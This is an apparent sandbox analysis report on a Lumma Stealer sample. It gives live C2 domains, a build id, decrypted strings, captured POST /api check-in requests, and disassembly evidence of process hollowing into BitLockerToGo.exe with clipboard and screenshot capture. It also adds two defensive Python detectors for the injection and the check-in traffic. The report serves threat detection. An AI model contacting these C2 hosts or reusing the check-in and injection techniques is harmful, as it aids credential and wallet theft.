Windows Analysis Report
iq2HxA0SLw.exe

Overview

General Information

Sample name: iq2HxA0SLw.exe (renamed because the original name is a hash value)
Original sample name: da6f9e46eacbde011e7d9a6e742d05c9.exe
Analysis ID: 1519274
MD5: da6f9e46eacbde011e7d9a6e742d05c9
SHA1: a022be00f60db2721120fbbf2acdd4435e86706a
SHA256: ac4b0d4dbdb661c626eef6c128ab65bbf2de3112dde7ef4d526520d1bae9d29f
Tags: exe, user-abuse_ch

Detection

LummaC, Go Injector, LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Go Injector
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign process
LummaC encrypted strings found
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Note: in this analysis the string "TeslaBrowser/5.5" was recovered by the string decryptor, but the captured POST /api requests (see Networking) carried a Chrome/119 user agent, so a detection keyed only on the TeslaBrowser user agent would have missed this traffic.

AV Detection

Source: priooozekw.shop Avira URL Cloud: Label: malware
Source: surroundeocw.shop Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api$& Avira URL Cloud: Label: malware
Source: racedsuitreow.shop Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/xy Avira URL Cloud: Label: malware
Source: covvercilverow.shop Avira URL Cloud: Label: malware
Source: pianoswimen.shop Avira URL Cloud: Label: malware
Source: https://racedsuitreow.shop/api= Avira URL Cloud: Label: malware
Source: abortinoiwiam.shop Avira URL Cloud: Label: malware
Source: pumpkinkwquo.shop Avira URL Cloud: Label: malware
Source: defenddsouneuw.shop Avira URL Cloud: Label: malware
Source: deallyharvenw.shop Avira URL Cloud: Label: malware
Source: 0.2.iq2HxA0SLw.exe.c0009c2000.6.unpack Malware Configuration Extractor: LummaC {"C2 url": ["racedsuitreow.shop", "priooozekw.shop", "defenddsouneuw.shop", "pianoswimen.shop", "surroundeocw.shop", "abortinoiwiam.shop", "pumpkinkwquo.shop", "covvercilverow.shop", "deallyharvenw.shop"], "Build id": "tLYMe5--rui333"}
Source: iq2HxA0SLw.exe ReversingLabs: Detection: 58%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 96.5% probability
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: covvercilverow.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: surroundeocw.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: abortinoiwiam.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: pumpkinkwquo.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: priooozekw.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: deallyharvenw.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: defenddsouneuw.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: racedsuitreow.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: pianoswimen.shop
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000000.00000002.1860600994.000000C000800000.00000004.00001000.00020000.00000000.sdmp String decryptor: tLYMe5--rui333
Source: unknown HTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.9:49709 version: TLS 1.2
Source: iq2HxA0SLw.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmp, iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: iq2HxA0SLw.exe, 00000000.00000002.1860600994.000000C000A56000.00000004.00001000.00020000.00000000.sdmp, iq2HxA0SLw.exe, 00000000.00000003.1840383482.000002457F310000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_0296D1A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, byte ptr [ecx+eax] 5_2_0296F860
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 5_2_0299FCBC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_029AA2AE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 5_2_0299B3F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_029AA310
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 5_2_0298A324
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_029880AF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh 5_2_029A90F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_029A90F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi+60h] 5_2_02993024
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov byte ptr [ecx], al 5_2_02993024
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h 5_2_0298E19C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 5_2_029871F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 5_2_0297B130
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ebx, ecx 5_2_02974166
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp byte ptr [edi+029B6029h], 00000000h 5_2_029736C9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 5_2_029736C9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 54CA534Eh 5_2_029A8650
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, ecx 5_2_0297E669
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh 5_2_0298C720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh 5_2_0298C720
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 5_2_02973756
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h 5_2_0298E740
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp dword ptr [029B33A4h] 5_2_0298E740
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 5_2_029904D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov byte ptr [edi], al 5_2_0298E419
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [eax], cx 5_2_02987450
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then jmp edx 5_2_02988446
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+18h] 5_2_0297F467
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh 5_2_029A4590
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_029A7BB0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 5_2_02965BC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 5_2_029A5B00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 5_2_02964B70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 5_2_029AAB60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 0633C81Dh 5_2_029A5850
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+58h] 5_2_0297590B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h 5_2_0298EE86
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [ecx+edx+02h], 0000h 5_2_029AAE70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah 5_2_029AAE70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp byte ptr [esi], 00000000h 5_2_02973F86
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [eax], cx 5_2_02984FD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov byte ptr [edi], al 5_2_02991FE0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp] 5_2_0298BF1C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [eax], dx 5_2_02980F10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+000004B0h] 5_2_0297DCD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h 5_2_029AACF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h 5_2_0298ECF4
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then inc edi 5_2_02973C2A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then movzx ecx, word ptr [esi+eax] 5_2_029A1DF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 5_2_02988D10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov word ptr [eax], cx 5_2_02988D10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then mov eax, dword ptr [esi] 5_2_0298CD0C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh 5_2_029A4D00
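The code-function evidence above comes from process 5, BitLockerToGo.exe, executing at heap-range addresses (0x0296xxxx to 0x029Axxxx), which together with the "Creates a process in suspended mode", "Allocates memory in foreign processes" and "Writes to foreign memory regions" signatures describes a hollowed copy of a legitimate Windows binary. As an added example (not Joe Sandbox code and not part of the sample), the following Python correlates Sysmon-style process-create (EventID 1) and process-access (EventID 10) records to flag that pattern: BitLockerToGo.exe started by a binary outside C:\Windows and then opened by that parent with memory-write rights. The event records, PIDs and access masks are constructed; only the two image paths come from this report. Treating a parent outside C:\Windows as suspicious for this child is an assumption made here.

```python
"""Correlate process-creation and process-access events to spot the injection
into BitLockerToGo.exe that this report records (suspended child, foreign
memory allocation and write). Added example for this report, not Joe Sandbox
or sample code. Events are constructed using Sysmon's field names (EventID 1
ProcessCreate, EventID 10 ProcessAccess); the image paths come from the report,
the PIDs and access masks are made up for the example. Treating any parent
outside C:\\Windows as suspicious for this child is an assumption.
"""
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
# Allocating and writing in a foreign process needs both rights.
INJECT_MASK = PROCESS_VM_OPERATION | PROCESS_VM_WRITE

INJECTION_TARGET = r"\bitlockerdiscoveryvolumecontents\bitlockertogo.exe"


def suspicious_parent(parent_image: str) -> bool:
    """Assumption: BitLockerToGo.exe is normally launched from under C:\\Windows."""
    return not parent_image.lower().startswith("c:\\windows\\")


def find_hollowing(events: list) -> list:
    """One finding per BitLockerToGo.exe child spawned by a suspicious parent,
    raised to high confidence when that parent also opened it with write rights."""
    findings = []
    for ev in events:
        if ev["EventID"] != 1 or not ev["Image"].lower().endswith(INJECTION_TARGET):
            continue
        if not suspicious_parent(ev["ParentImage"]):
            continue
        finding = {
            "child_pid": ev["ProcessId"], "parent_pid": ev["ParentProcessId"],
            "parent_image": ev["ParentImage"], "confidence": "medium",
            "evidence": ["process-create from parent outside C:\\Windows"],
        }
        for acc in events:
            if acc["EventID"] != 10:
                continue
            if (acc["SourceProcessId"] == finding["parent_pid"]
                    and acc["TargetProcessId"] == finding["child_pid"]
                    and int(acc["GrantedAccess"], 16) & INJECT_MASK == INJECT_MASK):
                finding["confidence"] = "high"
                finding["evidence"].append(
                    "process-access with VM_OPERATION|VM_WRITE " + acc["GrantedAccess"])
        findings.append(finding)
    return findings


# Constructed events: the sample on the user's Desktop spawns BitLockerToGo.exe and
# opens it with full access; explorer.exe spawning the same binary is the benign control.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 5312, "ParentProcessId": 4108,
     "Image": r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe",
     "ParentImage": r"C:\Users\user\Desktop\iq2HxA0SLw.exe"},
    {"EventID": 10, "SourceProcessId": 4108, "TargetProcessId": 5312,
     "SourceImage": r"C:\Users\user\Desktop\iq2HxA0SLw.exe",
     "TargetImage": r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe",
     "GrantedAccess": "0x1FFFFF"},
    {"EventID": 1, "ProcessId": 6020, "ParentProcessId": 3344,
     "Image": r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": 10, "SourceProcessId": 7000, "TargetProcessId": 5312,
     "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe",
     "GrantedAccess": "0x1000"},  # PROCESS_QUERY_LIMITED_INFORMATION only, not injection
]

if __name__ == "__main__":
    for f in find_hollowing(SAMPLE_EVENTS):
        print(f["confidence"], f["parent_image"], "->", f["child_pid"], f["evidence"])
```

The access-mask check deliberately requires both VM_OPERATION and VM_WRITE rather than matching the full 0x1FFFFF mask, so a loader that requests only the rights it needs is still caught, while routine query-only opens from system services are ignored.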

Networking

Source: Network traffic Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.9:49709 -> 104.21.37.97:443
Source: Network traffic Suricata IDS: 2056079 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (racedsuitreow .shop in TLS SNI) : 192.168.2.9:49708 -> 104.21.37.97:443
Source: Network traffic Suricata IDS: 2056078 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (racedsuitreow .shop) : 192.168.2.9:54044 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49709 -> 104.21.37.97:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49709 -> 104.21.37.97:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49708 -> 104.21.37.97:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49708 -> 104.21.37.97:443
Source: Malware configuration extractor URLs: racedsuitreow.shop
Source: Malware configuration extractor URLs: priooozekw.shop
Source: Malware configuration extractor URLs: defenddsouneuw.shop
Source: Malware configuration extractor URLs: pianoswimen.shop
Source: Malware configuration extractor URLs: surroundeocw.shop
Source: Malware configuration extractor URLs: abortinoiwiam.shop
Source: Malware configuration extractor URLs: pumpkinkwquo.shop
Source: Malware configuration extractor URLs: covvercilverow.shop
Source: Malware configuration extractor URLs: deallyharvenw.shop
Source: Joe Sandbox View IP Address: 104.21.37.97
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: racedsuitreow.shop
Source: global traffic HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Cookie: __cf_mw_byp=0umRl5oIKMzHffGYQzHVGWScuWA_ow6b6hNt1JaFJOc-1727336821-0.0.1.1-/api
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 80
    Host: racedsuitreow.shop
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: pianoswimen.shop
Source: global traffic DNS traffic detected: DNS query: racedsuitreow.shop
Source: unknown HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: racedsuitreow.shop
Source: BitLockerToGo.exe, 00000005.00000003.1862939480.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: BitLockerToGo.exe, 00000005.00000003.1862939480.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: iq2HxA0SLw.exe String found in binary or memory: https://github.com/golang/protobuf/issues/1609):
Source: BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002F09000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862501942.0000000002F0A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862501942.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002F36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://racedsuitreow.shop/api
Source: BitLockerToGo.exe, 00000005.00000003.1862501942.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://racedsuitreow.shop/api$&
Source: BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002F36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://racedsuitreow.shop/api=
Source: BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://racedsuitreow.shop/xy
Source: BitLockerToGo.exe, 00000005.00000003.1862795729.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862478504.0000000002F81000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.1874166391.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: BitLockerToGo.exe, 00000005.00000003.1862939480.0000000002F4C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000003.1862795729.0000000002F36000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown HTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.9:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.37.97:443 -> 192.168.2.9:49709 version: TLS 1.2
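The network evidence above fixes the shape of the check-in: a form-encoded POST to /api on one of the nine configured .shop domains, a Chrome user agent rather than the decrypted "TeslaBrowser/5.5", a Cloudflare "__cf_mw_byp" cookie on the second request, and the decrypted body template "lid=%s&j=%s&ver=4.0" with the build id "tLYMe5--rui333". As an added example (not Joe Sandbox code and not part of the sample), the following Python parses raw HTTP requests and scores them against those indicators, so that a single POST /api does not alert on its own. The sample requests are constructed: the headers are copied from the captured request, but the body follows the decrypted template because the sandbox shows only the body length, not its content.

```python
"""Flag HTTP requests shaped like the LummaC check-in captured in this report.

Added example for this report; it is not Joe Sandbox code or part of the sample.
Indicators are taken from the page: the nine C2 domains and build id from the
extracted configuration, the decrypted strings "lid=%s&j=%s&ver=4.0" and
"TeslaBrowser/5.5", and the captured POST /api form-encoded requests. Request
bodies below are constructed to follow that template; the capture shows only
headers and body length, not the body itself.
"""
from dataclasses import dataclass
from urllib.parse import parse_qs

LUMMA_C2_DOMAINS = frozenset({
    "racedsuitreow.shop", "priooozekw.shop", "defenddsouneuw.shop",
    "pianoswimen.shop", "surroundeocw.shop", "abortinoiwiam.shop",
    "pumpkinkwquo.shop", "covvercilverow.shop", "deallyharvenw.shop",
})
LUMMA_BUILD_ID = "tLYMe5--rui333"
LUMMA_UA = "TeslaBrowser/5.5"
LUMMA_CHECKIN_KEYS = frozenset({"lid", "j", "ver"})  # from lid=%s&j=%s&ver=4.0


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict  # header names lower-cased
    body: bytes


def parse_raw_request(raw: bytes) -> HttpRequest:
    """Split a raw HTTP/1.1 request into request line, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body)


def lumma_indicators(req: HttpRequest) -> list:
    """Return the Lumma check-in indicators a request matches."""
    hits = []
    host = req.headers.get("host", "").split(":")[0].lower()
    if host in LUMMA_C2_DOMAINS:
        hits.append("host:known-c2-domain")
    if req.method == "POST" and req.path == "/api":
        hits.append("uri:POST /api")
    if req.headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        hits.append("ctype:form-urlencoded")
    if LUMMA_UA in req.headers.get("user-agent", ""):
        hits.append("ua:TeslaBrowser/5.5")
    if "__cf_mw_byp=" in req.headers.get("cookie", ""):
        hits.append("cookie:cloudflare-bypass")  # seen on the second captured POST
    params = parse_qs(req.body.decode("latin-1", "replace"), keep_blank_values=True)
    if LUMMA_CHECKIN_KEYS.issubset(params):
        hits.append("body:lid/j/ver template")
        if params.get("lid") == [LUMMA_BUILD_ID]:
            hits.append("body:build-id " + LUMMA_BUILD_ID)
    return hits


def is_lumma_checkin(req: HttpRequest, min_hits: int = 3) -> bool:
    """Require three independent indicators so a lone POST /api does not alert."""
    return len(lumma_indicators(req)) >= min_hits


# Constructed sample traffic (not the sandbox capture): headers copied from the
# captured request, body filled in from the decrypted template.
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")
LUMMA_BODY = b"lid=tLYMe5--rui333&j=&ver=4.0"
SAMPLE_LUMMA = (
    b"POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: " + CHROME_UA.encode() + b"\r\n"
    b"Content-Length: " + str(len(LUMMA_BODY)).encode() + b"\r\n"
    b"Host: racedsuitreow.shop\r\n\r\n" + LUMMA_BODY
)
SAMPLE_BENIGN = (
    b"POST /api HTTP/1.1\r\nContent-Type: application/json\r\n"
    b"User-Agent: " + CHROME_UA.encode() + b"\r\n"
    b"Host: api.example.com\r\n\r\n" + b'{"ping":1}'
)

if __name__ == "__main__":
    for name, raw in (("lumma", SAMPLE_LUMMA), ("benign", SAMPLE_BENIGN)):
        req = parse_raw_request(raw)
        print(name, is_lumma_checkin(req), lumma_indicators(req))
```

Because the C2 domains sit behind Cloudflare (104.21.37.97, CLOUDFLARENETUS), blocking the IP is not useful; the domain list, the TLS SNI seen by the Suricata rules above and the body template are the durable indicators.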
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02998800 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 5_2_02998800
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 5_2_02999341 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt, 5_2_02999341
